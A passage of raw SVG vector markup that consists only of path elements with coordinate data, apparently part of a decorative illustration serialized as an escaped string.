d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path 